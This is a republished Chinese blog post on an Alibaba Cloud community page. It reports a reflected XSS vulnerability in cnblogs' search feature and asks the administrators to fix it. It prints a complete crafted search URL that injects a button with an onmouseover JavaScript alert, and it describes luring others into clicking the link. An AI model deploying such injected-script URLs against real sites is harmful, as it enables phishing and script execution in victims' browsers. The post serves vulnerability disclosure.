备案控制台
探索云世界
开发者社区 安全 文章 正文

找找看XSS漏洞!!!

2017-02-01 768
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:

跨站式脚本攻击(XSS)被评为07年排名第一的Web安全漏洞,拿“找找看”试了一把,发现存在漏洞,希望管理员尽快改掉

XSS示例 :

诱骗别人点击地址:

 http://zzk.cnblogs.com/s?w=cnblogs%22%2F%3E+%3Cinput+type%3D%22submit%22+class%3D%22btnSearch%22+onmouseover%3Djavascript%3Aalert%28%27YouAreHacked%21%27%29++value%3D%22%E9%A2%86%E5%8F%96%E7%A7%AF%E5%88%86&t=


别人粗一看,是博客园的找找看,放心大胆的进来了,结果:



本文转自CoderZh博客园博客,原文链接:http://www.cnblogs.com/coderzh/archive/2008/08/05/1261058.html,如需转载请自行联系原作者

文章标签:
安全
关键词:
XSS漏洞
zting科技
目录
相关文章
sumith
|
2月前
|
存储 安全 JavaScript
26、XSS漏洞介绍
26、XSS漏洞介绍
sumith
19 0
sumith
|
2月前
|
存储 安全 JavaScript
小课堂 -- XSS漏洞介绍
小课堂 -- XSS漏洞介绍
sumith
19 0
德迅云安全杨德俊
|
3月前
|
存储 开发框架 安全
如何处理预防XSS漏洞攻击问题
防止XSS攻击需要从多个方面入手,包括输入验证和过滤、输出编码、设置正确的HTTP头部、使用最新的安全框架和库、定期进行安全审计和漏洞扫描以及培训和意识提升等。只有综合运用这些措施,才能有效地防止XSS攻击,保护网站和用户的安全。
德迅云安全杨德俊
117 0
漏刻有时
|
9月前
|
安全 前端开发 JavaScript
信息服务上线渗透检测网络安全检查报告和解决方案2(安装文件信息泄漏、管理路径泄漏、XSS漏洞、弱口令、逻辑漏洞、终极上传漏洞升级)
信息服务上线渗透检测网络安全检查报告和解决方案2(安装文件信息泄漏、管理路径泄漏、XSS漏洞、弱口令、逻辑漏洞、终极上传漏洞升级)
漏刻有时
131 0
sumith
|
2月前
|
存储 安全
第二轮学习笔记:XSS跨站脚本漏洞
第二轮学习笔记:XSS跨站脚本漏洞
sumith
24 0
sumith
|
2月前
|
安全 开发工具 git
xss漏洞工具 -- xsser
xss漏洞工具 -- xsser
sumith
55 0
阿甘兄
|
5月前
|
SQL 安全 JavaScript
互联网并发与安全系列教程(05) - 常见的Web安全漏洞(XSS攻击、SQL注入、防盗链)
互联网并发与安全系列教程(05) - 常见的Web安全漏洞(XSS攻击、SQL注入、防盗链)
阿甘兄
60 0
游客grsdcyoknhiw4
|
8月前
|
安全 JavaScript 前端开发
xss漏洞
xss
游客grsdcyoknhiw4
58 0
九芒星#
|
8月前
|
SQL 存储 安全
【网络安全】护网系列-web漏洞(SQl、RCE、XSS)
【网络安全】护网系列-web漏洞(SQl、RCE、XSS)
九芒星#
352 0
漏刻有时
|
9月前
|
SQL 安全 JavaScript
跨站脚本攻击 (XSS)和SQL注入漏洞php排查解决方案
跨站脚本攻击 (XSS)和SQL注入漏洞php排查解决方案
漏刻有时
123 0